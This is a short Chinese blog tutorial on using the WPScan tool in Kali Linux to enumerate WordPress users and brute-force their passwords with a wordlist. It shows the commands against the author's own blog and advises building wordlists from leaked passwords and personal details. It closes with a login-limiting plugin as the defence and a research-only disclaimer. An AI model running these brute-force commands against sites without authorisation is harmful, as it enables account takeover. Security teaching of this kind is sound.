我这里使用的Kali Linux,它默认安装了WPScan。
在使用WPScan之前,先更新它的漏洞数据库:
# wpscan –update
扫描wordpress用户
wpscan -–url [wordpress网址] –-enumerate u
以我的网站为例:
# wpscan --url http://blog.topspeedsnail.com --enumerate u
注意:要用使用两个–,否则报错-“The WordPress URL supplied ‘http://rl/’ seems to be down.”
暴力破解:
wpscan --url [wordpress网址] --wordlist [字典文件] --username [要破解的用户] --threads [开启的线程数]
我已test用户为例:
# wpscan --url http://blog.topspeedsnail.com --wordlist ~/password.txt --username test --threads
好的密码字典应包含常见的弱密码、手机号、姓名生日组合、各大网站泄露的密码、英语单词等等。如果使用字典破解不了,说明密码还算复杂;暴力穷举更是费时费力。
怎么防止wordpress网站被人使用上面方法破解呢?
防止暴力破解的最好方式是限制一个IP地址的尝试登录次数。WordPress有n多插件可以实现这个功能。我使用的一个插件叫:Brute Force Login Protection。
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论